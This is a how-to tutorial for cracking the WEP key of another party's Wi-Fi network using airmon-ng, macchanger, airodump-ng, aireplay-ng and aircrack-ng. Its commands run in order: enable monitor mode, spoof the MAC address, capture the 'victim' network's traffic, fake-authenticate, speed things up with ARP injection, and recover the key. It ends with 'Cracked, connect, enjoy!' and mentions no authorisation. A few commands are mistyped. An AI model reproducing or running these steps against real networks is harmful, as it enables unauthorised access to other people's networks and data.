Cracking WEP

In this brief tutorial, I will give you the quick-n-easy on cracking a WEP network.

OS: Kali Linux

Applications: Airmon, Airodump, Aircrack, Macchanger Quotation marks are not to be added into the commands

Requirements: Backtrack 5 OS or LiveCD, a working wireless card or antenna (used for injection and monitoring)

Step 1: Open a terminal window, and type "airmon-ng" This will bring up all current network interface devices. Under most circumstances, your wireless card should appear as "wlan0"

Step 2: Type "airmon-ng start wlan0" (assuming wlan0 is your wireless interface) This command will put your wireless device into monitor mode, more commonly known as promiscuous mode. It will also change your device from wlan0, to mon0. mon0 is the interface that will be used through the remainder of this tutorial. Under normal circumstances, wireless devices may capture all data within the network, but will only process data meant for that particular device. Promiscuous, as the name suggests, allows the router to process ALL data coming its way.

Step 3: Now we want to change the the devices MAC Address. Why? Unlike IP's which can change with each connection, MAC Addresses are "burned" into the device. it is a static number, which means it will never change, unless we force it to......... Type "ifconfig mon0 down" to shut off the monitor interface Type "macchanger --m mac="WHATEVERYOUWANTFORTH EADDRESS" then push enter. Keep in mind, the MAC Address must stay in the form of "XX:XX:XX:XX:XX:XX", meaning it must have six pairs of numbers and/or letters Type "ifconfig mon0 up" to bring the monitor interface back up

Step 4: Type "airodump-ng mon0" This will bring up a list of local wireless devices (within range of your card). Since this is a WEP tutorial, choose a WEP network. when you find the one you want to crack, press "ctrl+c" to stop the scan

Step 5: You now want to choose where you want your captured data saved Type "airodump-ng -c [channel of victim] -w [filename to save as] --bssid [bssid of victim] mon0" Open a new shell, leaving this one running

Step 6: You now want to do a fake authentication of the victims device to get it talking with yours. Type "aireplay-ng -1 3 -a [bssid of victim] mon0" Wait for the authentication. Leave this shell running, open a new shell.

Step 7: If you notice in one of the previous shells, you'll see a section that says "# DATA", which is the amount of data captured from the victim. You can't start cracking their WEP key until that number reaches at least 5000. If that router isn't active, this may take a long time. Don't you wish you could fast forward time? You can with an ARP Injection, which will force that router to start talking. Think of it as the routers in an interrogation room, and you just flipped on the bright lights.

To perform the ARP Injection Type "aireplayng -3 -b [bssid of victim] -h [your faked bssid] mon0" This part usually takes a few minutes, but once it gets going you should see those numbers shown in "# DATA" start to fly

Step 8: Once you've reach at least 5000, you can start cracking the key. Type "aircrack-ng [name of saved file+ -01.cap]". For example, if you saved the file as "johnny", the filename would be "johnny-01.cap". Thats it! leave all terminals running until you see "KEY FOUND" Cracked, connect, enjoy!